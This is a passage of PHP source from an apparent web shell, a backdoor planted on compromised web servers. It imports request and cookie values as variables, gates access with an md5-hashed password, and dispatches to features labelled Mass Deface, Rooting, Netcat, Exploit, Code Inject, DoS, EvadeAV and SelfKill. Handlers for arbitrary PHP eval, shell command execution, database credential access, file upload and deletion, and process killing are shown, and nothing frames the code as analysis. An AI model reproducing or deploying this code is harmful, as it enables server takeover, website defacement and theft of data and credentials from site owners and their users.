$val) if (array_search($key,$blockKeys) === false) $$key=$val; foreach ($_POST as $key => $val) if (array_search($key,$blockKeys) === false) $$key=$val; foreach ($_COOKIE as $key => $val) if (array_search($key,$blockKeys) === false) $$key=$val; if (!isset($_SESSION["current_dir"])){ $_SESSION["current_dir"]=$path_info["dirname"]."/"; if (!$islinux) { $_SESSION["current_dir"] = ucfirst($_SESSION["current_dir"]); } } $current_dir=$_SESSION["current_dir"]; chdir($current_dir); if(!isLogged() and isset($_REQUEST['cv'])) { $script = basename(__FILE__); header("Location: $script"); exit(0); } if(!isLogged()) { try { $username = isset($_REQUEST['username'])? $_REQUEST['username']:""; $password = isset($_REQUEST['password'])? $_REQUEST['password']:""; if($username===$u and md5($password)===$p) { session_regenerate_id(); $_SESSION['username']='admin'; $script = basename(preg_replace('@\(.*\(.*$@', '', __FILE__)); header("Location: {$script}"); } else { displayLoginForm(); exit(0) ; } } catch(Exception $e) { echo "Error: ". $e->getMessage(); } } initializeSession(); displayPage(); function initializeSession() { global $current_dir, $cv, $ajx,$rpath, $path_info,$home, $dl, $del, $filename, $cd, $acp, $upl,$md,$defacePath,$ev,$sd,$connectDatabase,$listTables, $dlf,$dff,$tableData,$killPids,$Find,$cdf,$dlfile,$command,$NewFolder, $NewFile,$delf,$oldfname,$newfname,$vf,$cds; global $rnd; $rnd=rand(10,99); if(!isset($_SESSION['current_dir'])) $_SESSION['current_dir']=$current_dir; if(!isset($_SESSION["view"])) $_SESSION["view"]="File Manager"; if(!isset($_SESSION['HomeDir'])) $_SESSION['HomeDir'] = $path_info['dirname']; if(isset($cv)) { if($cv==1) { $_SESSION["view"]="File Manager"; } else if($cv==2) { $_SESSION["view"]="Upload"; } else if($cv==3) { $_SESSION["view"]="CMD"; } else if($cv==4) { $_SESSION["view"]="Database"; } else if($cv==5) { $_SESSION["view"]="Mass Deface"; } else if($cv==6) { $_SESSION["view"]="Symlink"; } else if($cv==7) { $_SESSION["view"]="Process"; } else if($cv==8) { $_SESSION["view"]="Eval"; } else if($cv==9) { $_SESSION["view"]="Find"; } else if($cv==10) { $_SESSION["view"]="Rooting"; } else if($cv==='chp') { $_SESSION["view"]="chp"; } else if($cv==13) { $_SESSION["view"]="Config"; } else if($cv==14) { $_SESSION["view"]="Mailer"; } else if($cv==15) { $_SESSION["view"]="Domains"; } else if($cv==16) { $_SESSION["view"]="Headers"; } else if($cv==17) { $_SESSION["view"]="Netcat"; } else if($cv==18) { $_SESSION["view"]="Commands"; } else if($cv==20) { $_SESSION['view']="Info"; } else if($cv==21) { $_SESSION["view"]="Hash"; } else if($cv==22) { $_SESSION["view"]="ZoneH"; } else if($cv==23) { $_SESSION["view"]="Exploit"; } else if($cv==24) { $_SESSION["view"]="Code Inject"; } else if($cv==25) { $_SESSION["view"]="Bypassers"; } else if($cv==26) { $_SESSION["view"]="DoS"; } else if($cv==27) { $_SESSION["view"]="Logs"; } else if($cv==28) { $_SESSION["view"]="SelfKill"; } else if($cv==29) { $_SESSION["view"]="Forums"; } else if($cv==37) { $_SESSION["view"]="PortScanner"; } else if($cv==34) { $_SESSION["view"]="EvadeAV"; } else if($cv==11) { session_destroy(); } header("Location: {$rpath}"); exit(0); } if(isset($upl)) { saveFile(); } if(isset($dff) and $dff=='Copy') { $_SESSION['Copy'] = $_POST['fileItem']; $_SESSION['CopyPath']=$_SESSION['current_dir']; $_SESSION['lastAction']='Copy'; header("Location: {$rpath}"); exit(0); } if(isset($dff) and $dff=='Cut') { $_SESSION['Cut'] = $_POST['fileItem']; $_SESSION['CutPath']=$_SESSION['current_dir']; $_SESSION['lastAction']='Cut'; header("Location: {$rpath}"); exit(0); } if(isset($dff) and $dff=='Paste') { processPaste(); header("Location: {$rpath}"); exit(0); } if(isset($dff) and $dff=='Delete') { processDelete(); header("Location: {$rpath}"); exit(0); } if(isset($dff) and $dff=='Zip') { compressFileFolder($_POST['fileItem']); header("Location: {$rpath}"); exit(0); } if(isset($killPids)) { killProcesses($_POST['killPid']); } if(isset($md)) { massDeface($defacePath); } if(isset($NewFolder)) { chdir($_SESSION['current_dir']); mkdir($NewFolder); chmod($NewFolder,0777); header("Location: {$rpath}"); exit(0); } if(isset($NewFile)) { chdir($_SESSION['current_dir']); touch($NewFile); chmod($NewFile,0777); header("Location: {$rpath}"); exit(0); } if(isset($connectDatabase)) { list($u,$h)=explode("@",$connectDatabase); echo listDatabases($u,$h); exit(0); } if(isset($listTables)) { list($u,$h,$db)=explode("@",$listTables); echo listTables($u,$h,$db); exit(0); } if(isset($command)) { $_SESSION['command']=$command; header("Location: {$rpath}"); exit(0); } if(isset($delf)) { total_delete($delf); header("Location: {$rpath}"); exit(0); } if(isset($oldfname) and isset($newfname)) { rename($oldfname,$newfname); header("Location: {$rpath}"); exit(0); } if(isset($dlf)) { $filename = compressFolder($dl); //$filename = compressFileFolder(); download(); exit(0); } if(isset($dff)) { $filename = compressFileFolder($_POST['fileItem']); download(); exit(0); } if(isset($tableData)) { list($u,$h,$db,$tbl)=explode("@",$tableData); echo displayTableData($u,$h,$db,$tbl); exit(0); } if(isset($ev)) { phpEval(); exit(0); } if(isset($sd)) { saveDatabaseCredentials(); exit(0); } if(isset($dl)) { global $filename; if($dlfile) $filename = $dl; else $filename = $_SESSION['current_dir'].$dl; download(); //header("Location: {$rpath}"); //exit(0); } if(isset($cd)) { chdir($_SESSION['current_dir']); chdir($cd); $_SESSION['current_dir']=format_path(getcwd()); if($cdf) { $_SESSION["view"]="File Manager"; } header("Location: {$rpath}"); exit(0); } if(isset($cds)) { chdir($cds); $_SESSION['current_dir']=format_path(getcwd()); $_SESSION["view"]="File Manager"; header("Location: {$rpath}"); exit(0); } if(isset($home)) { $_SESSION['current_dir']=format_path($_SESSION['HomeDir']); $_SESSION["view"]="File Manager"; header("Location: {$rpath}"); exit(0); } if(isset($acp)) { ajaxCurrentPath(); exit(0); } if(isset($_SESSION["view"])) { if( $_SESSION["view"]=="CMD" and isset($ajx) and $ajx==1) { echo execute_cmd(); exit(0); } } } function includePopups() { ?>